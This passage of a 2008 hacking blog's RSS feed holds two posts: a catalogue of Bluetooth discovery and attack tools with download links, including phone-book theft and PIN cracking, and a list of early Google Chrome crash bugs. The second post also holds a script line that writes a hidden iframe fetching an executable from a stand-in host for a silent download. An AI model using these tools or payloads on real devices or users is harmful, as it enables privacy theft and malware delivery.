<p><img title="bluetooth-logo.jpg" src="http://www.security-hacks.com/wp-content/uploads/2007/05/bluetooth-logo.jpg" alt="bluetooth-logo.jpg" align="right" /><a href="http://www.bluetooth.com/bluetooth/" target="_blank">Bluetooth technology</a> is great. No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).</p>
<p>If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.</p>
<p>This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.</p>
<p><strong>Discovering Bluetooth Devices</strong></p>
<p><em>BlueScanner</em> &#8211; BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. <a href="http://sourceforge.net/project/platformdownload.php?group_id=195755" target="_blank">Download BlueScan</a>.</p>
<p><em>BlueSniff</em> &#8211; BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. <a href="http://bluesniff.shmoo.com/bluesniff-0.1.tar.gz" target="_blank">Download BlueSniff</a>.</p>
<p><em>BTBrowser</em> &#8211; Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 &#8211; the Java Bluetooth specification. <a href="http://www.benhui.net/bluetooth/btbrowser.html" target="_blank">Download BTBrowser</a>.</p>
<p><em>B</em><em>TCrawler</em> -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. <a href="http://www.silentservices.de/btCrawler.html" target="_blank">Download BTCrawler</a>.</p>
<p><strong>Hacking Bluetooth</strong> <strong>Devices</strong></p>
<p><em>BlueBugger</em> -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. <a title="BlueBugger" href="http://www.easy-share.com/1903353348/bluebugger-0.1.rar" target="_blank">Download BlueBugger</a>.</p>
<p><em>CIHWB</em> &#8211; Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. <a href="http://sourceforge.net/project/showfiles.php?group_id=173145" target="_blank">Download CIHWB</a>.</p>
<p><em>Bluediving</em> &#8211; Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. <a href="http://sourceforge.net/project/showfiles.php?group_id=155933" target="_blank">Download Bluediving</a>.</p>
<p><em>Transient Bluetooth Environment Auditor</em> &#8211; T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. <a href="http://freshmeat.net/redir/t-bear/67412/url_tgz/tbear.tar.gz" target="_blank">Download T-BEAR</a>.</p>
<p><em>Bluesnarfer</em> &#8211;  Bluesnarfer will download the phone-book of any mobile device vulnerable to <a href="http://www.salzburgresearch.at/research/publications_detail_e.php?pub_id=152" target="_blank">Bluesnarfing</a>. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. <a href="http://www.alighieri.org/tools/bluesnarfer.tar.gz" target="_blank">Download Bluesnarfer</a>.</p>
<p><em>BTcrack</em> &#8211; BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. <a href="http://www.nruns.com/_en/security_tools_btcrack.php" target="_blank">Download BTcrack</a>.</p>
<p><em>Blooover II</em> &#8211; Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. <a href="http://trifinite.org/Downloads/Blooover2.jar" target="_blank">Download Blooover II</a>.</p>
<p><em>BlueTest</em> &#8211; BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. <a href="http://packetstorm.linuxsecurity.com/wireless/bluetest.pl.txt" target="_blank">Download BlueTest</a>.</p>
<p><em>BTAudit</em> &#8211; BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. <a href="http://www.betaversion.net/btdsd/download/bt_audit-0.1.1.tar.gz" target="_blank">Download BTAuding</a>.</p>
<p>What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis.</p></div>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=348&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/09/tools-for-hacking-bluetooth-enabled-devices.html/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Google Chrome Vulnerabilities list</title>
		<link>http://www.hungry-hackers.com/2008/09/google-chrome-vulnerablities-list.html</link>
		<comments>http://www.hungry-hackers.com/2008/09/google-chrome-vulnerablities-list.html#comments</comments>
		<pubDate>Sat, 06 Sep 2008 05:52:04 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Crashed]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Google Chrome]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[List]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[Web Browser]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=346</guid>
		<description><![CDATA[Ok, news is old, Google has released a new browser and all the web is blogging about it. But my duties are to talk about security so I&#8217;m not going to review Google Chrome&#8217;s features but to list the vulnerabilities already found after only 16 hours from the release. (I fear this post will be outdated in few Hours)

Rishi Narang has been the first. A Denial Of Service simple as pie:
Just browse this page and place your mouse over this link (make sure you bookmark this page if you want ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Ok, news is old, Google has released a new browser and all the web is blogging about it. But my duties are to talk about security so I&#8217;m not going to review Google Chrome&#8217;s features but to list the vulnerabilities already found after only 16 hours from the release. (I fear this post will be outdated in few Hours)</p>
<p style="text-align: center;"><img class="aligncenter" src="http://www.hackerscenter.com/images/62//chrome_sm.jpg" border="0" alt="" /></p>
<p style="text-align: justify;"><a href="http://www.greyhat.in/" target="_blank">Rishi Narang</a> has been the first. A Denial Of Service simple as pie:</p>
<p style="text-align: justify;">Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):</p>
<blockquote style="text-align: justify;"><p><a href="evil:%">CRASH ME </a></p></blockquote>
<p style="text-align: justify;">Just &#8220;evil:%&#8221; in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).</p>
<p style="text-align: justify;">Someone has also reported that by entering a very long bookmark may kill the browser. Length has not been given but it&#8217;s worth a try.</p>
<p style="text-align: justify;">If your Chrome is still alive you may want to try entering</p>
<blockquote style="text-align: justify;"><p>about@:</p></blockquote>
<p style="text-align: justify;">in the location bar.</p>
<p>Good thing is that the browser doesn&#8217;t need Administrator rights to run.</p>
<p style="text-align: justify;"><a href="http://www.mattcutts.com/blog/" target="_blank">Matt Cutt </a>from his blog has stated that the <a href="http://www.google.com/chrome/eula.html" target="_blank">chapter 11 of Eula</a> will be updated. Yes the chapter about you giving all the rights to Google:</p>
<blockquote style="text-align: justify;"><p>a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.</p></blockquote>
<p style="text-align: justify;">I&#8217;m worried about the enthusiastic reviews I see online.<br />
Google brand was enough to push an <em>unfinished</em> product up to <a href="http://blog.statcounter.com/" target="_blank">make it 1% of the User-Agent&#8217;s</a> used on its very first day.<br />
The risk is high, fuzzers are still crunching&#8230;
</p>
<p style="text-align: justify;"><strong>Update:</strong></p>
<blockquote><p><strong>Another Bug found.</strong><br />
&lt; script &gt; document.write(&#8216;&lt; iframe src=&#8221;http://www.example.com/hello.exe&#8221; frameborder=&#8221;0&#8243; width=&#8221;0&#8243; height=&#8221;0&#8243; &gt;&#8217;); &lt; / script &gt;</p></blockquote>
<p>This script <em>should</em> (I haven&#8217;t tested it yet, will do it later) trigger a silent download on the client machine.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=346&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/09/google-chrome-vulnerablities-list.html/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>


<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching using disk: basic
Object Caching 1210/1411 objects using disk: basic

Served from: hungry-hackers.com @ 2012-02-10 13:04:57 -->
